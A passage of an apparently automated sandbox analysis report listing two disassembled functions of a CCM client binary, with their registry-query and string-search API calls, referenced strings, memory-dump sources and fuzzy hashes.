                                                                                          • Instruction ID: 8156d8db8e4926a7ab29398582f74c6652014c771f82a9a1a57448f54cd798cc
                                                                                          • Opcode Fuzzy Hash: 5b79a613d03dfa9f5e129a5f4841f3ca10e81c37d985843d9286a1d037f19daf
                                                                                          • Instruction Fuzzy Hash: 4131F73160425AE7CF11DE58C94ABEE3FB5BF96714F658855F810EB281DB38CD008B55
                                                                                          Function 005F7156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F715D
                                                                                          • RegQueryValueExW.ADVAPI32(?,00000064,00000000,00000000,00000001,0000001C,CCM::Utility::RegKey::GetString,0000001C,005FB057,00000064,00000001,80000002,00000000,00000000,00000000,CCM::Utility::GetCcmDirectory), ref: 005F71D4
                                                                                          Strings
                                                                                          • CCM::Utility::RegKey::GetString, xrefs: 005F7179
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catchQueryValue
                                                                                          • String ID: CCM::Utility::RegKey::GetString
                                                                                          • API String ID: 1659098252-1406425785
                                                                                          • Opcode ID: 9ab693b544400f33883bc01bb64ead41ef141b823bdf959031d287c15a9c32a4
                                                                                          • Instruction ID: 47a53febcfdf204f3d4a9c437dfa90dce8322c3d236efe262221424e8d50f1dd
                                                                                          • Opcode Fuzzy Hash: 9ab693b544400f33883bc01bb64ead41ef141b823bdf959031d287c15a9c32a4
                                                                                          • Instruction Fuzzy Hash: C121A43194425EDBDB11DFA88906FFE7EB1BF18310F24415DEA41A7240D7798E04DB91
                                                                                          Function 0064A1C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064A1C9
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • _wcsstr.LIBCMT ref: 0064A22B
                                                                                          Strings
                                                                                          • CCM::LocationServices::ValidateDistinguishedName, xrefs: 0064A1E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch__wcsstr
                                                                                          • String ID: CCM::LocationServices::ValidateDistinguishedName
                                                                                          • API String ID: 741560716-3710971154
                                                                                          • Opcode ID: f396f26a52c7a4167ad9d3c96b814126a1a7f815ad738938f54cf0a73b77a9b9
                                                                                          • Instruction ID: d49fdfd54dc71996e78a1151afc1b4fcd761e94e5705a5ce950096d6cde45ef8
                                                                                          • Opcode Fuzzy Hash: f396f26a52c7a4167ad9d3c96b814126a1a7f815ad738938f54cf0a73b77a9b9
                                                                                          • Instruction Fuzzy Hash: 4011B131C45249EEDF14EBF8D44A7DDBFB0AF25310F24805AE151B72C2CA741648DB61